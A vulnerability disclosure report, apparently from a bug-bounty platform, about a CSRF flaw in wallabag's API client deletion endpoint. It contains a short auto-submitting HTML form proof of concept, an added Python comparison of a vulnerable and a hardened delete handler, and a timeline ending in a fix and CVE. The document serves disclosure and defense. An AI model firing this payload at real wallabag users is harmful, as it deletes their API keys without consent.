CSRF leading to delete Client API in API clients management in wallabag/wallabag

Status: Valid

Reported on Mar 31st 2023


Description

wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability which allows attackers to arbitrarily delete a victim's API keys via the client/delete/{id} endpoint. As the proof of concept below shows, the deletion is performed on a plain GET request that carries no CSRF token, so any page the logged-in user visits can trigger it.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.125.133/developer/client/delete/2">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


Impact

This vulnerability can be used to trick a logged-in user into deleting their own API key: the victim only needs to load an attacker-controlled page while authenticated to wallabag.
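To make the defect and its fix concrete, here is an added example (not wallabag's code, and not the fix in commit ffcc5c) of a delete handler written the way the report describes, next to a hardened version. The hardened handler accepts only POST and requires a token that is stored in the server-side session and echoed in the legitimate confirmation form; a cross-site page cannot read that token, so the auto-submitting form in the PoC is rejected. The route name, the form field `_token`, the in-memory client list and the status codes are all assumptions made for this example.

```python
import hmac
import secrets


def sample_clients() -> dict:
    """Constructed sample data: the API clients of one user, keyed by id."""
    return {1: "mobile-app", 2: "browser-extension"}


def issue_csrf_token(session: dict) -> str:
    """Create a per-session CSRF token once and keep it in the server-side session."""
    if "_csrf" not in session:
        session["_csrf"] = secrets.token_urlsafe(32)
    return session["_csrf"]


def render_delete_form(session: dict, client_id: int) -> str:
    """The confirmation form the legitimate UI renders; it carries the session's token.

    A page on another origin can build a form with the same action, but it cannot
    read this token, which is what breaks the cross-site request.
    """
    token = issue_csrf_token(session)
    return (
        f'<form method="POST" action="/developer/client/delete/{client_id}">'
        f'<input type="hidden" name="_token" value="{token}">'
        '<button type="submit">Delete client</button></form>'
    )


def delete_client_vulnerable(method: str, session: dict, form: dict,
                             clients: dict, client_id: int) -> int:
    """The pattern in the report: any authenticated request, even a GET, deletes."""
    if client_id not in clients:
        return 404
    del clients[client_id]
    return 302  # redirect back to the client list


def delete_client_hardened(method: str, session: dict, form: dict,
                           clients: dict, client_id: int) -> int:
    """State-changing action: POST only, with a CSRF token bound to this session."""
    if method != "POST":
        # A link, an <img>, or the PoC's auto-submitted GET form stops here.
        return 405
    expected = session.get("_csrf")
    submitted = form.get("_token", "")
    # Constant-time comparison on bytes: differing lengths simply compare unequal.
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403  # token missing or forged
    if client_id not in clients:
        return 404
    del clients[client_id]
    return 302


if __name__ == "__main__":
    session, clients = {}, sample_clients()
    # The PoC's request: a cross-site GET with no token, against each handler.
    print("vulnerable:", delete_client_vulnerable("GET", session, {}, sample_clients(), 2))
    print("hardened  :", delete_client_hardened("GET", session, {}, clients, 2))
    # The legitimate flow: render the form, then POST its token back.
    token = issue_csrf_token(session)
    print("legit POST:", delete_client_hardened("POST", session, {"_token": token}, clients, 2))
```

The hardened handler is the shape of the generic fix: make the deletion a POST, validate a session-bound token, and keep the GET route (if any) read-only. Setting the session cookie with a `SameSite` attribute is a useful second layer, but it does not replace the token check because older clients and some cross-site navigations do not honour it.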

Timeline

8 months ago: We are processing your report and will contact the wallabag team within 24 hours.
8 months ago: TuanTH modified the report.
8 months ago: We have contacted a member of the wallabag team and are waiting to hear back.
5 months ago: Nicolas Lœuillet validated this vulnerability.
TuanTH has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7

5 months ago: TuanTH (Researcher) commented:

Thanks @nicosomb, I hope this vulnerability can be assigned a CVE.

3 months ago: Nicolas Lœuillet marked this as fixed in 2.6.3 with commit ffcc5c.
Nicolas Lœuillet has been awarded the fix bounty.
This vulnerability has been assigned a CVE.
3 months ago: Nicolas Lœuillet published this vulnerability.
3 months ago: Nicolas Lœuillet gave praise:

Thank you @tht1997!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1